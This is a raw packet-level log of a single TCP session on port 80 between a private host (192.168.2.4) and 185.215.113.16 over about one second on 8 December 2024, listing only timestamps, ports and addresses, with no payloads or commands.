Dec 8, 2024 19:52:39.927382946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.927433014 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.927464962 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.927511930 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.928297997 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.928349018 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.928369045 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.928409100 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.929203033 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.929254055 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.929291964 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.929339886 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.930056095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.930104971 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.930165052 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.930212021 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.931042910 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.931090117 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.931158066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.931205034 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.931869030 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.931920052 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.931984901 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.932029009 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.932724953 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.932774067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.932789087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.932835102 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.933650970 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.933706999 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.934108019 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.934155941 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.934489965 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.934537888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.934566021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.934629917 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.935370922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.935419083 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.935481071 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.935520887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.936280012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.936327934 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.936496973 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.936543941 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.937163115 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.937211037 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.937319040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.937362909 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.938019037 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.938071966 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.938163042 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.938210964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.938895941 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.938944101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.939063072 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.939109087 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.939788103 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.939837933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.939872980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.939918041 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.940671921 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.940721989 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.940793037 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.940836906 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.941656113 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.941731930 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.941768885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.941807032 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.942441940 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.942490101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.942882061 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.942931890 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.943335056 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.943387032 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.943439960 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.943483114 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.944236040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.944289923 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.944427967 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.944478035 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.945137024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.945185900 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.945225954 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.945271015 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.946067095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.946079016 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.946119070 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.946873903 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.946924925 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.947037935 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.947087049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.947778940 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.947829008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.948007107 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.948052883 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.948633909 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.948681116 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.948769093 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.948813915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.949529886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.949577093 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.949642897 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.949687958 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.950440884 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.950488091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.950561047 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.950608015 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.951291084 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.951349974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.951435089 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.951478958 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.952209949 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.952255964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.952310085 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.952357054 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.953109026 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.953155994 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.953273058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.953320026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.953993082 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.954030991 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.954040051 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.954068899 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.954843998 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.954905033 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.954950094 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.954992056 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.955708981 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.955746889 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.955837011 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.955883980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:39.956615925 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:39.956657887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.103014946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.103157043 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.103215933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.103873968 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.103918076 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.104033947 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.104044914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.104087114 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.104166031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.104204893 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.104943991 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.104990959 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.105050087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.105093002 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.105811119 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.105928898 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.105968952 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.106725931 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.106775045 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.106796026 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.106832981 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.107503891 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.107692003 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.107741117 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.108407021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.108465910 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.108643055 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.108686924 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.109378099 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.109457016 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.109500885 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.110264063 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.110435009 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.110486031 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.111083031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.111129999 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.111170053 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.111207962 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.111926079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.111970901 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.112127066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.112166882 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.112833023 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.112878084 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.113157034 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.113204002 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.113925934 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.113984108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.114129066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.114201069 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.114635944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.114675045 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.114859104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.114897966 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.115480900 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.115576982 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.115613937 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.115957975 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.116400957 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.116568089 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.116575003 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.116605997 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.117243052 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.117281914 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.117393017 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.117491961 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.118133068 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.118185997 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.118321896 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.118364096 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.119028091 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.119105101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.119137049 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.119179964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.119944096 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.119987011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.120055914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.120094061 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.120846987 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.120893955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.121071100 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.121121883 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.121685982 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.121733904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.121826887 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.121867895 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.122600079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.122653008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.122711897 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.122839928 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.123430967 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.123485088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.123544931 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.123642921 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.124372005 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.124423027 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.124497890 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.124541998 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.125232935 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.125283957 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.125340939 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.125379086 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.126094103 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.126141071 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.126202106 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.126291990 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.126993895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.127134085 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.127150059 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.127218008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.127872944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.127939939 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.127953053 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.127990961 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.128783941 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.128824949 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.128854036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.128892899 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.129683971 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.129770041 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.129813910 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.130603075 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.130614042 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.130651951 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.130665064 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.131438017 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.131477118 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.131520033 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.131596088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.131608009 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.132294893 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.132344007 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.132373095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.132404089 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.133188963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.133236885 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.133289099 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.133322954 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.134080887 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.134135008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.134201050 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.134259939 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.134987116 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.135067940 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.135147095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.135183096 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.135850906 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.135894060 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.136001110 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.136102915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.136750937 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.136818886 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.136856079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.136892080 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.137665033 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.137701035 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.137722969 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.137767076 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.138552904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.138605118 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.138681889 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.138744116 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.139389992 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.139482975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.139532089 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.140265942 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.140310049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.140453100 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.140494108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.141228914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.141269922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.141278028 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.141314030 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.142088890 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.142128944 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.142158031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.142204046 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.142966032 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.143029928 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.143069983 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.143816948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.143860102 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.143924952 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.143966913 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.144733906 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.144778967 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.144810915 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.144845963 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.145603895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.145643950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.145725965 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.145761013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.146466970 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.146507025 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.146576881 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.146611929 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.147373915 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.147418022 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.147509098 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.147545099 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.148243904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.148361921 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.148411989 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.149215937 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.149274111 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.296675920 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.296727896 CET	80	49757	185.215.113.16	192.168.2.4
